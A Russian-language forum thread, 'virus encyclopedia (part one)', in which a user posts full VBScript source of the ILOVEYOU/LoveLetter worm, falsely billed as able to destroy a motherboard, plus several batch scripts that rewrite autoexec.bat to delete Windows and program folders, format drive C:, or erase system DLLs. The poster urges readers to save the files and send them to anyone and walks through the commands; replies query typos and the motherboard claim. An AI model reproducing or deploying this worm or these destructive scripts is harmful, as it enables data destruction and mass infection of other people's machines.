virus encyclopedia(part one)

Модератор: gloom

Ответить
Аватара пользователя
syria
Юзер
Сообщения: 93
Зарегистрирован: Пт июл 29, 2005 14:01
Откуда: Syria
Контактная информация:

virus encyclopedia(part one)

Сообщение syria »

the first viruse to destroy the mainbord:furst copy this cod to netbode and save it as name.bat
**************
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d
ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
REM main() ' CSS: Main has been REMed out to provide more innoculation. unREM to run.
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
REM spreadtoemail() ' CSS: Causes the worm to propogate itself. REMed for even more innoculation.
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/ HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf
7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/ skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j
nHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/ jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3V
bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/ sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras
djhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy
7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate " HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr
entVersion\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about :blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
Sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script>"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com/"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega
d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
******************************************************************************


2-second virus to make format to the hard disk
******
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
************************************************************************


3- to erase all system's files
*****
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
**********************************************************************

4-to destroy the hard disk completly
****
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
************************************************
5- to make format,save it as: Autoexec.bat
***
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul
>>c:\autoexec.bat
*****************************************************
Аватара пользователя
rageX
Старожил
Сообщения: 1076
Зарегистрирован: Пт май 06, 2005 18:10

Сообщение rageX »

ет ты вирус чоли написал???
Аватара пользователя
Твинсен
Отец
Сообщения: 3604
Зарегистрирован: Пт окт 04, 2002 19:08
Откуда: оттуда
Контактная информация:

Сообщение Твинсен »

the first viruse to destroy the mainbord
судя по этому - вирус, умеющий выводить из строя мат плату... херьня! еще никогда не слышал, чтобы ПО могло физически повредить ПК
Аватара пользователя
syria
Юзер
Сообщения: 93
Зарегистрирован: Пт июл 29, 2005 14:01
Откуда: Syria
Контактная информация:

Сообщение syria »

rageX писал(а):åò òû âèðóñ ÷îëè íàïèñàë???
da toliko zdelai copy i sahranai kak bila napisno i preslai komu hocesh.

[off]äîáàâëåíî ñïóñòÿ 19 ìèíóò:[/off]
Òâèíñåí писал(а):
the first viruse to destroy the mainbord
ñóäÿ ïî ýòîìó - âèðóñ, óìåþùèé âûâîäèòü èç ñòðîÿ ìàò ïëàòó... õåðüíÿ! åùå íèêîãäà íå ñëûøàë, ÷òîáû ÏÎ ìîãëî ôèçè÷åñêè ïîâðåäèòü ÏÊ
esle ne veresh tagda pobrovai..i dai nam resultati pojaliusta
Аватара пользователя
Nawar
Новичок
Сообщения: 35
Зарегистрирован: Вс сен 18, 2005 04:24
Откуда: Syria
Контактная информация:

Сообщение Nawar »

u4en horosaya tema daji prekrasnaya no ea ne ponyal cto eto (( netbode ))
mojeti beti hotel skazati notebad ili text document..! :super: :super:
:gg: :P :P

[off]äîáàâëåíî ñïóñòÿ 2 ìèíóòû:[/off]

;) ne komo ne slushay ea znaio kakoi ti umni ... :gg: :beer: :super:
Аватара пользователя
rageX
Старожил
Сообщения: 1076
Зарегистрирован: Пт май 06, 2005 18:10

Сообщение rageX »

syria,
один вопрос , что вместо смайликов??????

*********************** тоже должно быть???



ну все , звезда вражеским обьектам :gg:

[off]добавлено спустя 5 минут:[/off]

Nawar,
notebad
ет шо вообше такое???
Аватара пользователя
syria
Юзер
Сообщения: 93
Зарегистрирован: Пт июл 29, 2005 14:01
Откуда: Syria
Контактная информация:

Сообщение syria »

[quote="rageX"]syria,
îäèí âîïðîñ , ÷òî âìåñòî ñìàéëèêîâ??????

*********************** òîæå äîëæíî áûòü???



íó âñå , çâåçäà âðàæåñêèì îáüåêòàì :gg:

[off]äîáàâëåíî ñïóñòÿ 5 ìèíóò:[/off]

Net ne dolijno biti,eta prosto ea napisal ctobi kajde virus bil oden.
Аватара пользователя
rageX
Старожил
Сообщения: 1076
Зарегистрирован: Пт май 06, 2005 18:10

Сообщение rageX »

syria,
format.com c >
???
Аватара пользователя
syria
Юзер
Сообщения: 93
Зарегистрирован: Пт июл 29, 2005 14:01
Откуда: Syria
Контактная информация:

Сообщение syria »

rageX писал(а):syria,
format.com c >
???
ne poneal???gde eta nashol?
Аватара пользователя
rageX
Старожил
Сообщения: 1076
Зарегистрирован: Пт май 06, 2005 18:10

Сообщение rageX »

5- to make format,save it as: Autoexec.bat
***
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul
>>c:\autoexec.bat


[off]добавлено спустя 39 секунд:[/off]

перед каждым смайлом
Аватара пользователя
syria
Юзер
Сообщения: 93
Зарегистрирован: Пт июл 29, 2005 14:01
Откуда: Syria
Контактная информация:

Сообщение syria »

[/quote] ïåðåä êàæäûì ñìàéëîì[/quote]


ya tebe obisnu.
etoto virus nacinaet v echo off@ :eta zncet mi nacinali program ili viruse
call attrib -h -r c:\autoexec.bat >nul : eta znaceti mi dali value nol dlea ctobi udalel cto mi hotem
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat :koneshno deltree eta znaceti ctobi zdelati deleti fse file gde driver c usobinno gde program rapotaet i zdelati ih off.
echo copy c:\windows\command\format.com c >nul >>c:\autoexec.bat : a zdes ctobi nasha fso eta rapotala nada ctobi mi zdelali uravrinie,koroce nasha uravnie ctobi c:\windows\command\format.com bila rovno na autoexec.bat
echo copy c:\windows\command\deltree.exe c >nul >>c:\autoexec.bat :toje zdes kak nazad
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat eta nazivaetsa output nasha order
echo format c: /q /u /autotest >nul toje zdes kak nazad
>>c:\autoexec.bat : a eta nasha file

no ne zabudi sahranet etot file v imia autoexec.bat eta obizatilino ili pominai cod gde etot imia i postav liuboi
Аватара пользователя
syria
Юзер
Сообщения: 93
Зарегистрирован: Пт июл 29, 2005 14:01
Откуда: Syria
Контактная информация:

Сообщение syria »

dalishe virus v drogoi tema
viewtopic.php?t=14362
Ответить

Вернуться в «Software»